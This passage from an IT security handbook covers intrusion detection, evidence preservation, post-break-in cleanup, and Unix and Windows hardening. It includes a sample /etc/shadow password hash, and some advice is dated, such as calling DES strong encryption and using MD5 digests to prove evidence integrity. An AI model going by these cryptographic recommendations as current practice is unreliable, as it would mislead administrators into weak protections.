an intruder in the act, you still have a good chance of finding the intruder's tracks by FIVE routinely looking through the system logs. Look for things out of the ordinary; for example: · Users logging in at strange hours · Unexplained reboots · Unexplained changes to the system clock 336 IT SECURITY FOR TECHNICAL ADMINISTRATORS · Unusual error messages from the mailer, ftp daemon, or other network server · Failed login attempts with bad passwords · Unauthorized or suspicious use of the su command · Users logging in from unfamiliar sites on the network On the other hand, if the intruder is sufficiently skillful and achieves superuser access on your machine, he or she may erase all evidence of the invasion. Simply because your system has no record of an intrusion in the log files, you can't assume that your system hasn't been attacked. Many intruders operate with little finesse: instead of carefully editing out a record of their attacks, they simply delete or corrupt the entire log file. This means that if you discover a log file deleted or containing corrupted information, there is a possibility that the computer has been successfully broken into. However, a break-in is not the only possible conclusion. Missing or corrupted logs might mean that one of your system administrators was careless; there might even be an automatic program in your system that erases the log files at periodic intervals. You may also discover that your system has been attacked if you notice unauthorized changes in system programs or in an individual user's files. This is another good reason for using a file integrity tool to monitor your files for changes. If your system logs to a hardcopy terminal or another computer, you may wish to examine that log first, because you know that it can't have been surreptitiously modified by an attacker coming in by the telephone or network. Preserving the Evidence If you wish to prosecute your attacker (if you ever find the person) or sue them for damages, you will need to preserve some evidence that a crime has been committed. Even if you do not wish to take any legal action, you may find it useful to collect evidence of the attack so that you have the ability to reconstruct what happened. There are many approaches to gathering evidence. Here are some approaches that we have found successful: 1. Capture the data in the system's memory. On Unix, you can use the dd command: # dd bs=1024 < /dev/mem > mem.image # dd bs=1024 < /dev/kmem > kmem.image 2. Make a complete copy of the computer's disk drives. Now remove the original disks, place them in a vault, and work with the copies on another machine. If your system uses the /proc filesystem, the copied /proc may be of particular interest. 3. Copy key files that were left or modified by the intruder into an archive. Make a copy of this archive on several computers. 4. Write modified files to CDR or DVD-RAM media. 5. Run arp -a or arp -v to print the contents of the ARP table, which may suggest network connections that have been recently established. 6. If your web site was defaced, save the HTML pages on your computer's hard drive. Use a screen capture utility to record a copy of how the image looked on your computer's screen. 7. Take copies of displays that might reflect the current state of the compromised system. X-Windows systems can use xwd for this purpose; Microsoft Windows systems can use the PrtSc key. 8. Compute the MD5 digest of any images or files that you recover. Print the MD5 on a piece of paper, sign it, date it, and put it in your incident log book. You can use this MD5 at a later point in time to establish that the evidence has not been altered. There are commercial products that you may find useful to assist you in preserving evidence, including high-speed disk duplicators and network forensics analysis tools (NFATs) that record all packets entering and leaving an organization. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 337 If you have involved law enforcement authorities, speak with them before attempting to preserve any evidence on your own. Cleaning Up After the Intruder If your intruder gained superuser or administrator access, or access to another privileged account such as mail, he may have modified your system to make it easier for him to break in again in the future. If the intruder has installed a password sniffer or stolen the password file, he'll potentially have access to a legitimate account and will be able to get back in no matter what other precautions are taken. You'll have to change all of the passwords on the system. After a successful break-in, you must perform a careful audit to determine the extent of the damage. Depending on the nature of the break-in, you'll have to examine your entire system. You may also need to examine other systems on your local network, or possibly the entire network (including routers and other network devices). An intruder can compromise a system in many ways that can be difficult or impossible to detect. The safest course of action is to reinstall the operating system from scratch, apply all security patches, reinstall application programs from scratch (along with their patches) and then carefully restore user files from backups, or, if necessary, the compromised disks. Here are some particularly common things to watch for in your audit: New Accounts After a break-in, scan for newly created accounts. Delete any accounts that have been created by an intruder. You may wish to make a paper record of each account before deleting it in case you wish to prosecute the intruder (assuming that you ever find the villain). Changes in file contents or permissions An intruder who gains privileges can change any file on your system. Although you should make a thorough inventory of your computer's entire filesystem, you should look specifically for any changes to the system that affect security. For example, an intruder may have inserted trap doors or logic bombs to do damage at a later point in time. A clean copy of a file integrity checker and a known good backup of its database are invaluable. New SUID and SGID files Intruders who gain superuser access frequently create SUID and SGID files when the system supports them. After a break-in, scan your system to make sure that new SUID files have not been created. (PUIS, 151-154) Changes in network access files An intruder may have created or changed files to allow remote access in the future. For example, under Unix, the intruder may create new .rhosts or.ssh/authorized_keys files in your users' home directories, or added machines to the system-wide /etc/hosts.equiv file. Check all of these files and ask users to do the same. (PUIS, 705-706) Changes to startup files An intruder may have modified the contents of user or system-wide startup files, or files that may be automatically PART run at scheduled times or when triggered by certain events (like automatically forwarding an e-mail message). All these files need to be carefully checked. FIVE Change to configuration files Any service that runs as a privileged user and reads a configuration file may be vulnerable to changes made to that configuration file. The Windows Registry is the epitome of vulnerable configuration files. All configuration files for services should be checked against known good copies or cryptographic signatures. 338 IT SECURITY FOR TECHNICAL ADMINISTRATORS Hidden files and directories The intruder may have created "hidden directories" on your computer, and may be using them as a repository for stolen information or for programs that break security. Intruders often hide their files in directories with names that are a little difficult to discover or enter on the command line. This way, a novice system administrator who discovers the hidden directory will be unlikely to figure out how to access its contents. Filenames that are difficult to discover or enter include ".. " (dot dot space), and names containing control characters, backspaces, or other special characters. Some names can be entered in Unicode that display as familiar alphabetic characters but that cannot be entered easily from the keyboard. Another approach is to use filenames that sound like they are obscure parts of the operating system that should not be tampered with (file systems that have "system" attributes for directories are particularly vulnerable to this approach.) Unowned files Sometimes attackers leave files in the filesystem that are not owned by any user or group. This can happen if the attacker created an account and some files, and then deleted the account--leaving the files. Alternatively, the attacker might have been modifying the raw data on a disk and changed a UID by accident. New network services Many intruders (and many attack scripts) will install network daemons that provide backdoor access to the compromised host at a later time, or can be used to direct the host to act as a zombie in attacks against other hosts. Although these new services can sometimes be detected by the output of system commands on the compromised host, those commands are also frequently modified. You may be able to detect new daemons using nmap or another port scanning tool from an uncompromised machine on the same network. (Of course, it's always safest to disconnect a compromised machine from your network while you're investigating it.) You may also need to sweep the entire filesystem and observe what files and directories were accessed around the time of the intrusion. This may give you some clues as to what was done. For instance, if your compiler, loader, and libraries all show access times within a few seconds of each other, you can conclude that the intruder compiled something. If you open files to search for changes, the time of last access on those files will change. Therefore, you will be unable to detect patterns of access. For this reason, we suggest that you conduct your forensics on a copy of your disks, mounted read-only. If you don't have the hardware to make a copy, many systems will allow you to remount live partitions read-only (possibly through a loopback interface). Do your forensics on the copy. But realize that simply executing commands on this setup will likely change their access times, and the access times of any shared libraries and configuration files (unless you remount every partition)! Thus, your best bet may be to mount the disks read-only on another system, and do your checking from there. Never Trust Anything Except Hardcopy If your system is compromised, don't trust anything that is on its disks. If you discover changes in files on your system that seem suspicious, don't believe anything that your system tells you, because a good system cracker can change anything on the computer. The attacker can compile and install new versions of any system program--so there might be changes, but your standard utilities might not tell you about them. The attacker can patch the kernel that the computer is running, possibly disabling security features that you have previously enabled. The attacker can even open the raw disk devices for reading and writing. Often, they don't need (or have) great skill. Instead, they have access to rootkits put together by others with more skill. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 339 The only limit to the powers of an attacker who has gained superuser status is that the attacker cannot change something that has been indelibly printed on a piece of paper to which the attacker does not have access. For this reason, if you have a logging facility that logs whenever the date is changed, you might consider having the log made to a hardcopy terminal or to another computer. Then, be sure to examine this log on a regular basis. To further protect yourself, you should have a bootable copy of your operating system on a zip disk, CD-ROM, or other removable storage device. This gives you a way of booting and examining your system with a set of tools that are known to be uncorrupted. Coupled with a database of message digests of unmodified files,245 you should be able to find anything important that was modified on your system -- provided that your message digests were generated from uncorrupted versions of your software. Remember that you cannot necessarily trust your backups, as you don't know when the intrusion started: use distribution media if possible. The next step is to get a printed copy of all of the necessary logs that you may have available (e.g., console logs and printed copies of network logs), and to examine these logs to try to get an idea of what the unauthorized intruder has done. You will also want to see if anything unusual has happened on the system since the time the intruder logged in. These logs may give you a hint as to what programs the intruder was running and what actions the intruder took. Be sure to initial and timestamp these printouts. Keep in mind that the time you discover a break-in is not necessarily the same time as when it started! In one incident, there was evidence that the actual intrusion had occurred two years before! There were no backups or copies of software on the system that could be trusted. In fact, the intruders had been making wholesale changes to the system during all that time ... installing patches and upgrades! They were doing a better job of administration than the person charged with managing the machine. Resuming Operation The next step in handling a break-in is to restore the system to a working state. How quickly you must be back in operation, and what you intend to do about the break-in over the long term, will determine when and how you perform this step. At a minimum, you want to get whatever assurance you can that you have restored anything damaged on the system, and fixed whatever it was that allowed the intruder in. Then, if you have been keeping good backups, you can restore the system to a working state. The difficulty with determining what failed and allowed an intruder in is complicated by the fact that there is usually little data in the logs to show what happened, and there are few things you can execute to reverse-engineer the break-in. Most break-ins seem to result from either bugs or, less commonly, compromised user passwords (suspect this especially if you find that the intruders have installed a sniffer on your system). If the break-in was the result of a bug, you may have difficulty determining what it is, especially if it is a new one that has not been widely exploited. Here are some things to try: PART 1. If you have been recording your network traffic, examine your analysis system to see if any of the traffic is odd or unexplained. FIVE 2. Examine your log files looking for unusual entries, unusual patterns of activity, or evidence that programs have crashed. 3. If you know the specific IP address that the attacker used as the source of the attack, search through all of your log files for records of that IP address. 245You can use Tripwire to produce such a database, or you can develop your own software. 340 IT SECURITY FOR TECHNICAL ADMINISTRATORS If you suspect that it is a bug in some system software, you can try contacting your vendor to see if you can get some assistance there. In most cases it helps if you have a maintenance contract or are a major customer. You might consult recent postings to the security groups on web sites or mailing lists. Often, current vulnerabilities are discussed at these locations in great detail. It is also the case that sometimes these sites contain information that is incorrect and even dangerous advice. Therefore, be very wary of what you read. Finally, you may wish to contact a FIRST team appropriate for your site. Teams in FIRST often have some insight into current break-ins, largely because they see so many reports of them. Contacting a representative from one of the teams may result in some good advice for things to check before you put your system back into operation. However, many teams have rules of operation that prevent them from giving too much explicit information about active vulnerabilities until the appropriate vendors have announced a fix. Thus, you may not be able to get complete information from this source. Damage Control If you've already restored the system, what damage is there to control? Well, the aftermath, primarily. You need to follow through on any untoward consequences of the break-in. For instance, was proprietary information copied? If so, you need to notify your legal counsel and consider what to do. You should determine which of the following concerns need to be addressed: 1. Do you need to file a formal report with law enforcement, a regulatory agency, an insurance company, or your vendor? 2. Do you need to institute disciplinary or dismissal actions against one or more employees? Do you need to update employee training to forestall any future incidents of this type? 3. Do you need to update your disaster recovery plan to account for changes or experiences in this instance? 4. Do you need to investigate and fix the software or configuration of any other systems under your control, or at any affiliated sites? 5. Do you need to have your public relations office issue a formal report (inside or outside) about this incident? The answers to the above questions will vary from situation to situation and incident to incident. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 341 CHAPTER 10. SYSTEM-SPECIFIC GUIDELINES At a Glance Most of this handbook applies no matter what kind of hardware and operating systems you're running. This chapter discusses some technical recommendations that are specific to Unix/Linux, Microsoft Windows, and MacOS 7-9 operating systems (MacOS X is covered by the Unix material). Unix and Unix-like Operating Systems246 Traditionally, Unix-based systems were deployed in large-scale multiuser time-sharing environments, or as clusters of workstations with networked filesystems. Today, Unix-based systems are increasingly used as single-user workstations or servers. Because there have been so many different versions of Unix-like operating systems, many security mechanisms are vendor-specific. It's particularly important to read all of the manuals for your vendor's version of Unix. Several good books, web sites, and mailing lists devoted to Unix security are listed in Annexes 2-5. Users, Groups, and the Superuser Much of Unix's security relies on the separation of users and user groups. All files and processes have an associated effective user and group id that determines what privileges they have. Two users should never share the same account or user ids; instead, assign individual accounts and use groups to share file access rights among users. On Unix-like systems, the user root (uid 0) is the superuser and usually has the ability to modify every aspect of the system. Accordingly, protecting the root account and processes that run with root privileges is a critical aspect of Unix security. Avoid using the root account for routine activities, and disable logins by root. When you must use root, use the su command (or a variation like sudo) to change from your normal user account to root. This both creates accountability through logging and requires that an attacker subvert two accounts to gain superuser access. Obviously, it behooves you to limit access to commands like su; on some systems, only users in the wheel group can use su. Some Unix kernels support the ability to limit what even root can do while the system is running in its normal mode, through the use of kernel security levels or capabilities. Check your vendor's documentation to determine if these limits are available in your version, and take advantage of them if they are. If you have particularly sensitive data files, you may wish to keep them encrypted and on removable media to guard against their exposure in the event that the root account is compromised. Note, however, that encryption is not sufficient if the decryption program resides on the same system, as an attacker with superuser access can modify the decryption program to save a copy of the decrypted file. PART Filesystems and Security Files in Unix are assigned an owner and a group, and the chmod command is used to specify what the owner, FIVE members of the file's group, and everyone else can do to the file. These file permissions include the ability to read the file's contents, write to the file, and execute the file as a program. Permissions on directories are used to 246Throughout this section, we will be referring to Unix and Unix-based systems interchangeably. Although the term "Unix" will appear in this text most often, the information is applicable to Linux and other variants on Unix. 342 IT SECURITY FOR TECHNICAL ADMINISTRATORS control who can examine files in the directory and who can add or remove files from a directory. Learn how to use chown, chgrp, and chmod to control access to files, and ls to list important file access information. Each Unix user has a umask value that determines the default permissions for files and directories they create. Use the umask command in login scripts to insure that users have an appropriate umask value. The value 027 allows only others in the user's group to read and execute, but not modify, files. The value 077 denies any access to anyone but the user themselves. Some Unix systems support more fine-grained access control lists (ACLs) for files. ACLs can grant or deny permission for individual users to read, write, or execute files. If your system supports ACLs, learn how to use them. Some Unix systems support immutable and append-only attributes on files. An immutable file can't be altered, even by root, unless the system is booted in a special low-security mode from the console. An append-only file can only be added to, and not otherwise modified or deleted; log files are good candidates for append-only attributes. If your system provides these, take advantage of them. Unix files with the setuid (SUID) permission run with the effective user id of their owner, rather than of the user who executes them. SUID files allow one user to execute commands that require the privileges of another (often root); as such, they represent a potential vulnerability. Setgid (SGID) files run with the effective group id of their group, rather than that of the user who executes them. You should periodically scan your system for SUID/SGID files and make sure that you know why they have those permissions. Keep a list of these files printed out. Avoid writing SUID/SGID programs yourself; never write SUID/SGID shell scripts. Some filesystems can be mounted with a nosuid option that prevents SUID/SGID permissions from functioning; it's a good idea to mount user home directories and other non-system partitions with this option. Unix represents devices as files. For example, printers, serial ports, hard drives, and even the system's memory are accessible through device files. Although device files are generally found in the /dev directory, they can be created anywhere by a user with appropriate (usually superuser) privileges. If an unauthorized user can read your system memory, they can access sensitive information of other users; if they can write to your system memory, they can compromise the system. The same caution applies to raw disk devices and several other kinds of devices. Scan for device files on your system and insure that they have appropriate ownership and permissions. If your filesystems can be mounted with a nodev option, consider using that. On some systems, a file called logindevperm or fbtab controls how device permissions are modified when a user logs in at the console (to prevent, for example, remote users from turning on the microphone and monitoring the room). If you have this file, check to be sure it's properly set up. Encryption Several Unix commands seem to obfuscate data but are ineffective as encryption. Don't use rot13 or the crypt command, as they are trivial to break. Many systems provide strong encryption through a des command, or through the openssl application and libraries. Similarly, don't rely on the sum command for cryptographically strong checksums. Instead use md5, md5sum, or openssl to generate cryptographic message digests. TCP/IP Networking Unix systems are often used for network applications and services. Many network services are started by the inetd (or xinetd) daemon. Examine the configuration file(s) used by this daemon and disable any services that you do not need; protect other services with the TCP wrapper daemon tcpd, unless your inetd has built-in support for TCP wrappers. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 343 Other network services are started at system boot by files in the /etc/init.d or /etc/rc*.d directories on in the files /etc/rc and /etc/rc.local. Disable any services that you do not use. Pay particular attention to services that may provide outsiders with information about your system or its users, such as fingerd. Every Unix system should run its own host-based packet-filtering firewall. Consult vendor documentation to determine if your system has a firewall and how to use it. Typical firewall configuration tools include ipfw, ipchains, and iptables. These firewalls should be configured to block all packets by default, and to allow only packets destined for services you intend to provide. An external firewall should be used to prevent outsiders from accesses several protocols and services that might be offered by hosts in your organization (e.g., SNMP, NFS, NTP, LPD, Samba, RIP). Use static routing whenever possible. Traditionally, several standard services depended on authentication by the hostname or IP address of the client, or by passwords sent in plaintext over the network connection. Neither of these approaches is secure. Instead, applications should use cryptographic approaches to authentication, with either shared or public key systems. Many applications (telnet, rlogin, rcp, rsh, ftp) can be disabled and replaced with Secure Shell (ssh), which provides strong authentication. Do so, and remove any .rhosts or /etc/hosts.equiv entries that list ip addresses of trusted machines. Other services (pop, imap, http, ldap) should be compiled with the OpenSSL libraries to provide SSL/TLS connections to clients so that passwords are not transmitted unencrypted. When possible, run network services as non-root users. Many network daemons can be configured to start up as root (in order to bind to a network port lower than 1024, which requires root privileges on most Unix systems), and then give up their privileges and change to a non-root user. Give each daemon its own non-root account to use, rather than sharing a single ("nobody") account. When possible, run network services in a chroot jail environment to limit the damage possible if they are compromised. If you run anonymous FTP services, use an up-to-date version of the FTP daemon. Don't provide your real /etc/passwd file in the FTP area. Make sure that /etc/ftpusers, the list of users who cannot connect by FTP, includes at least root, uucp, bin, and any other account that does not belong to an actual human being. Be paranoid about the directory permissions and ownership in the FTP area; configure "incoming" directories to prevent downloads and "outgoing" directories to prevent uploads. Scan your FTP logs regularly. If possible, use postfix, exim, or qmail instead of sendmail on mail servers. Never use anything but the latest version of your MTA. Use mail aliases to insure that mail to any valid non-user account is delivered to a real user; in particular, be sure that mail can be delivered to root, postmaster, and abuse addresses. Protect the mail aliases file from changes by unauthorized individuals. If you have mail aliases that deliver mail to programs or files, examine them carefully and delete them if possible. Do run the authd/identd daemon if you have multiuser machines. This can help you if you receive a report of someone at your system attacking another system. Use a version that returns encrypted identifiers to avoid exposing user information to outside systems. If you don't use RPC, disable the portmapper daemon; if you do, restrict access to it and use the securenets feature PART if it's available. Disable any RPC services provide by inetd that you don't use (and rexd in particular). Use Secure RPC if it's available on your system. Only Secure RPC provides a reasonable basis for using NIS+ or NFS. Avoid using FIVE NIS or NIS+ in compatibility mode. If you use NFS, use version 3 in TCP mode if possible, and limit the number of filesystems you export and the set of hosts who may mount them. Try to export filesystems read-only. Unless you specifically tell it not to, NFS protects exported root-owned files from modification by root on the client host so it can be beneficial to insure that all exported files and directories are owned by root, rather than by other users (such as bin) that might exist on the client host. 344 IT SECURITY FOR TECHNICAL ADMINISTRATORS If you use X11, enable the best authentication possible. Kerberos or Secure RPC are strong authentication systems. "Magic cookies" are weaker. The xhost program provides the least security. Tunneling X11 connections through SSH also provides strong protection. If you provide SMB service with Samba, prefer "user" or "domain" security to "share" security. Enable encrypted passwords, and require that clients use a recent version of the SMB protocol with Samba's "min protocol" option. Don't use the "admin user" option or map the DOS archive bit to the Unix executable permission. Learn how to use the "veto files" option. Keep an eye on your network. Scan the output of netstat and lsof regularly to see what network connections are being made to and from your system. Use who and last to see user connections. Use nmap, Nessus, ISS, and other network security scanners to probe your system from the outside to see if you have vulnerabilities that should be corrected. For some machines, it may be best to disconnect them from the network altogether. Defending Accounts The first line of defense for Unix accounts is their password. Unix systems don't store user passwords in plaintext; instead, they store a cryptographic hash of the password that can not be decrypted into the password. When a user logs in, the system computes the hash of the password they type and compares it to the stored hash. Older Unix systems stored user account information and encrypted passwords in the /etc/passwd file. This file must be world readable so that processes can associate user ids with login names. Unfortunately, that meant that local users (or others) could copy the passwd file and attempt to find passwords by encrypting common dictionary words, account names, etc. and comparing their encrypted attempts with the passwords listed in the files. Newer Unix systems continue to store public account information in /etc/passwd, but store the encrypted password information in a file called /etc/shadow (or sometimes /etc/passwd.adjunct) that is readable only by root. Many Unix systems come with several default accounts that are used to separate process or file ownership privileges, such as daemon, bin, uucp, etc. Make sure that the encrypted password entry for all of these accounts begins with a "*" character so that no possible password can be used to access the account. Here's an excerpt of a /etc/shadow file: root:$1$24g7KF8j$Rjky384Fd1PvtSCOJ/WW.1:12264:0:99999:7:::134551156 bin: *:10890:0:99999:7::: daemon:*:10890:0:99999:7::: adm:*:10890:0:99999:7::: lp:*:10890:0:99999:7::: sync:*:10890:0:99999:7::: shutdown:*:10890:0:99999:7::: halt:*:10890:0:99999:7::: In this example, only the root account has a valid password. No one can log into the other accounts (although root can still assume their privileges with the su command if necessary). On many systems, account passwords can be set to expire after a certainly amount of time, which provides valuable protection against an attacker taking over a dormant account which the actual owner wouldn't notice. Use a lifetime between one and six months. On many systems, you can require that passwords meet certain strength requirements (length of password, variety of characters, etc.) This functionality is often available through PAM on systems that support it. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 345 It's a good idea not to create default or guest accounts, but if you must, consider using the rsh or rbash restricted shell so that the account can only run a limited number of commands (don't confuse this with the remote shell client, also called rsh). Make sure that none of the commands provide access to an unrestricted shell (as many editors do). Protecting Against Programmed Threats Never unpack or compile new software as root. It's often possible to compile software in a chroot environment to protect yourself against some kinds of Trojan horses. Keep an eye on the PATH environment variable of users (especially root). The PATH specifies the list of directories that will be checked when a command is typed without giving an absolute path. Root's PATH should only contain standard directories that are writable only by trusted accounts, and that are regularly audited for changes (using software like Tripwire or AIDE). Don't put "." (the current directory) in the PATH, as this makes it easy for attackers to trick root into running Trojaned software. When working as root, get into the habit of typing full paths to important commands (e.g. /bin/su). You should also use full paths in all shell scripts, startup files, or cron jobs that you write. Preventing Denial of Service Attacks Unix systems offer several protections against denial of service attacks. Many systems support per-user limits on CPU and memory usage through PAM or other login files, and per-user limits on disk usage through the quota system, if you enable it (and you should). Processes and Memory The ps command is used to view processes running on the system. On BSD-based Unix flavors, ps ­auxw lists all processes; on SVR5-based flavors, use ps ­elf. Each process has a process id number that is used to reference it in commands that interact with running processes. Keep an eye on user processes. Use programs like top and lsof regularly to see what processes your system is running, and by whom. Enable process accounting so you can keep track of processes that have been run in the past and users who might be using excessive processing time. The nice or renice commands can be used to reduce the amount of CPU priority a process has, and are useful for long-running background tasks. Root can also use nice to increase CPU priority for processes, which can be helpful when user processes are bogging down the system and root needs to get enough CPU time to stop them. The kill command is used to send a signal to a process. Some signals are used to tell daemons to reread configuration files or to notify them about changes in the system. Other signals can be used to suspend or terminate a process. The TERM signal (sent by default with kill , or explicitly using kill ­TERM ) often terminates a process; the KILL signal unconditionally terminates a process. The TSTP signal suspends a PART process, and is useful when you want to make an image of the process's memory with gcore for forensic purposes, or when self-replicating processes have taken up all the process slots. In the latter case, you can suspend each process FIVE and then kill them all at once so that they can not spawn. Unix systems support virtual memory, traditionally called swap space. When the system processes require more memory than RAM installed, disk space devoted to swapping is used instead. Insure that you have sufficient swap 346 IT SECURITY FOR TECHNICAL ADMINISTRATORS space on disk partitions (some Unix systems can also swap to files on standard filesystem partitions, although this is less efficient). Disks In addition to the quota system, protect disks by isolating critical partitions from those that might be filled accidentally or intentionally, such as mail spool or file upload areas. Insure that each partition has sufficient space and inodes for file storage. Monitor disk usage regularly and encourage users to archive and delete old files. Microsoft Operating Systems Microsoft's operating systems began with a focus on standalone personal computing. They were soon actively deployed in networks, initially using Microsoft's own protocols, and later converging primarily on TCP/IP. Systems based on Windows 3.x and Windows 95/98/ME are largely suitable only as client workstations; in contrast, systems based on Windows NT (including Windows 2000 and XP) are often configured as servers and have much more sophisticated security controls.247 Differences in Windows versions can be dramatic. If you are in an environment that mixes several versions of Windows, each may require different attention. This section focuses primarily on hardening security on NT-based systems. As with other operating systems, there's no substitute for reading the manuals, as well as other books, web sites, and mailing lists devoted to Windows security. Microsoft's web site includes a large security section with many documents and useful tools, including the Baseline Security Analyzer, a program that analyzes the configuration of NT-based systems and makes recommendations for hardening them. Run it frequently. Users, Groups, and the Administrator Windows also uses Users and Groups to control permissions; Groups in particular usually define the abilities of their Users, though finer-grained per-user access controls are also available. As distributed, the user "Administrator" is granted membership in the "Administrators" group, which provides superuser privileges over the system, and represents a key target for attackers. The administrator account can be protected in several ways. Changing the name of the account to something else makes automated attacks more difficult (though it is often still possible to determine the new name); creating a disabled dummy account named Administrator can help you detect attacks. Administrator logins can be restricted to the local console, and can be audited. It's crucial to keep track of which users belong to which groups. The "Computer Management" application in the Administrative Tools folder provides a view of all Users and Groups that are defined. Filesystems and Security Windows systems can use two types of filesystems: FAT-based filesystems (FAT, VFAT, FAT32) are compatible with all versions of Microsoft's operating systems, while NTFS filesystems are only support by NT-based versions. Only NTFS provides any filesystem security. The FAT filesystem has no concept of file ownership or access control, and should not be used on any secure system. 247Oddly, DOS systems are also useful as servers in some situations. Because they are single-user systems that offer few points of attack, they can be highly suitable for use as single-purpose log servers, terminal servers, firewalls, and even DNS servers. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 347 Access to file and directories on NTFS systems are managed through Access Control Lists (ACLs). ACLs typically specify which permissions ­ read, write, execute, list contents, modify, or full control, among others ­ have been granted to which groups of users. Each object in the filesystem (and in the Windows registry) has an associated ACL or inherits one from a folder above it. The ACL system is a powerful and complicated security tool that requires considerable study. Microsoft provides some security templates that assign reasonable ACLs to system folders and registry keys, but you may wish to be more restrictive. Encryption Microsoft Windows provides a unified CryptoAPI library for cryptographic support. On NTFS filesystems, files and directories can be encrypted using the cipher.exe tool, which sets up an transparent encrypted file system (EFS). EFS is based on public key cryptography so remote users can access their encrypted data as long as they present the appropriate private key; in addition, EFS can be configured so administrators can recover encrypted data if the key is lost (which may or may not enhance security). TCP/IP Networking Before Windows 2000 Microsoft Windows supported a peer-to-peer Ethernet networking model (NetBIOS over the NetBEUI transport protocol) before the widespread emergence of TCP/IP, and the legacy of NetBIOS remains in Microsoft's Printer and File sharing services, which are implemented as NetBIOS over TCP/IP (sometimes called "NBT"). The file sharing protocol itself is referred to as Server Message Block (SMB) or CIFS. Internet RFCS 1001 and 1002 describe NetBIOS over TCP/IP in great detail. NetBIOS includes its own host name resolution and authentication protocols. In the simplest model, NetBIOS nodes (hosts) discover each other and register their names on the network by using broadcast packets. In addition to being difficult to scale up to larger networks, this mode makes it relatively simple for nodes to "steal" one another's registered name and effectively impersonate one another. A more secure mode of operation requires the NetBIOS nodes to communicate (point-to-point) with hosts designated as NetBIOS name service nodes (sometimes called WINS servers) to register and look up names, and with NetBIOS datagram distribution nodes to broadcast packets at the NetBIOS level. The NetBIOS name servers can provide safeguards against machines spoofing each other's names. In addition, the registry key \HKEY_LOCAL_ MACHINE\CurrentControlSet\Services\Netbt\Parameters\NoNameReleaseOnDemand can be set to 1 to prevent servers from responding to name release requests that might be forged by an attacker who wishes to claim a server's name and impersonate the server. In most cases, users who wish to use a resource must first log into the SMB server providing that resource. The login process in modern SMB dialects uses challenge- response authentication.248 When a user requests to log in, PART the SMB server sends a unique challenge string to the client. The client encrypts this string using a session key computed from a cryptographic hash of the user's password and returns the response to the SMB server. The SMB FIVE server performs the same computation and compares its results to the client's. If they match, the user is authenticated. The exact form of the computation depends on the SMB dialect in use; two major approaches ("LM" and "NT") are currently defined. 248Older SMB dialects (e.g., that used in Windows for Workgroups) allowed plaintext passwords to be sent over the network. 348 IT SECURITY FOR TECHNICAL ADMINISTRATORS Note that this approach implies that the SMB server (or some other authentication server with which it communicates) has the user's hashed password available to it (but not necessarily the cleartext password). If this server is compromised, all the user hashed passwords are compromised (so the attacker may be able to masquerade as the user and connect to other SMB servers). On the other hand, this approach prevents the cleartext or hashed password from ever traveling over the network. SMB authentication servers must thus be protect like Kerberos domain controllers. If Windows file sharing will not be used, NetBIOS over TCP/IP can be completely disabled in the Advanced TCP/IP Settings. If all machines in the network support the newer versions of the NetBIOS/SMB protocols, they should be configured to only respond to requests using the latest possible protocol version (NTLMv2 in most cases), to prevent an attacker from negotiating an earlier, flawed protocol. If remote administration of filesystems is not necessary, the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\ AutoShareWKS can be set to 0 to disable it. Windows can be configured to allow remote users access not only to files, but also to registry keys. The security permissions on the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurePipeServers\winreg key determine which users can remotely modify the registry. It is important to insure that this group include only Administrators if remote access is necessary, and nobody at all otherwise. The Remote Registry Access service can also be disabled. The Advanced TCP/IP Settings for network adaptors on Windows NT-based systems include a simple packet filter that can be configured to allow or deny incoming TCP or UDP packets by destination port, as well as filtering non-IP protocols. Since Windows 2000 Windows 2000 domains provide significantly more control over participating clients than was available in earlier versions. Notably, domain security policies can override clients' local security policies when the client joins the domain, which can be useful to centrally insure that your client workstations have strong security. Windows 2000 and later systems use Kerberos as their primary network security layer, although they continue to support NetBIOS, and the recommendations above apply. Kerberos, as discussed earlier in this handbook, provides for secure authentication and authorization for network services. The Windows 2000 Primary Domain Controller is the Kerberos master. Windows 2000 also supports IPsec for creating virtual private networks. IPsec negotiation can be requested or required on client and server connections. IPsec is configured through the IP Security Policy Management application. Earlier Windows versions used a proprietary Microsoft protocol (PPTP) for VPN tunnels; in most cases, you should prefer IPsec unless you need to support older systems. Windows XP also added a built-in stateful packet filter called Internet Connection Filter (ICF) that is ideal for systems that will be used as Internet clients. By default it only allows incoming packets associated with connections initially established by the client. Defending Accounts Recent Windows-based systems support long passwords for accounts. Encourage or force users to use longer passwords or passphrases rather than shorter ones to reduce the risk of password guessing. These systems also support "complexity requirements" for passwords and password expiration. On systems participating in Windows Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 349 2000 domains, passwords are stored on the domain controller and managed in the usual Kerberos fashion. Account lockout settings can also be turned on to make password-guessing attempts more costly. By default, most Windows systems come without security auditing turned on. Auditing is configured in the Local Security Policy (or through the domain security policy). It can be useful to turn on auditing for account logons and account management (success and failure) in order to keep an eye on attempted logins. Audited events are displayed in the Event Viewer. Logging several kinds of failure events (such as failed privilege use) can also be helpful. Be sure to set maximum sizes for all logs (through the Event Viewer), and to disable guest access to logs. Protecting Against Programmed Threats Windows NT-based systems often come configured with several services enabled. Windows services, like Unix daemons, are background processes that provide functions to applications. In some cases, these services provide access to outsiders via the network, as they offer remote access services (like telnet) or remote procedure calls. For example, the Messenger service permits remote machines to pop up alert windows on local machines, and has been abused by spammers. Using the Services application in the computer management console, ensure that all unnecessary services are stopped and disabled. On clients that don't share files, the telnet, server, remote registry access, and several other remote access services can be disabled to decrease points of vulnerability (sometimes at the expense of centralized management). Using the local or group security policy, ensure that anonymous users have no access without explicit permissions (this setting appears in the Security Options folder in Local Policies on Windows 2000). Preventing Denial of Service Attacks Processes and Memory Windows processes can be monitored and halted with the Task Manager. Task Manager can also adjust process priority to one of six levels, from "Low" to "Realtime", and display memory usage. Because few Windows systems are used in multiuser timesharing environments, process and memory overflow attacks are usually the result of an errant program that can be detected and halted through Task Manager. Disks NTFS supports a user quota system that can be used to protect disks from overflow conditions. Again, this is most useful on shared client workstations, as servers should generally have few users other than their administrators, and server applications often require administrative privileges. Network Windows NT-based systems provide several registry settings that can help protect them from some kinds of network denial of service attacks, such as SYN flooding. In most cases, however, these settings 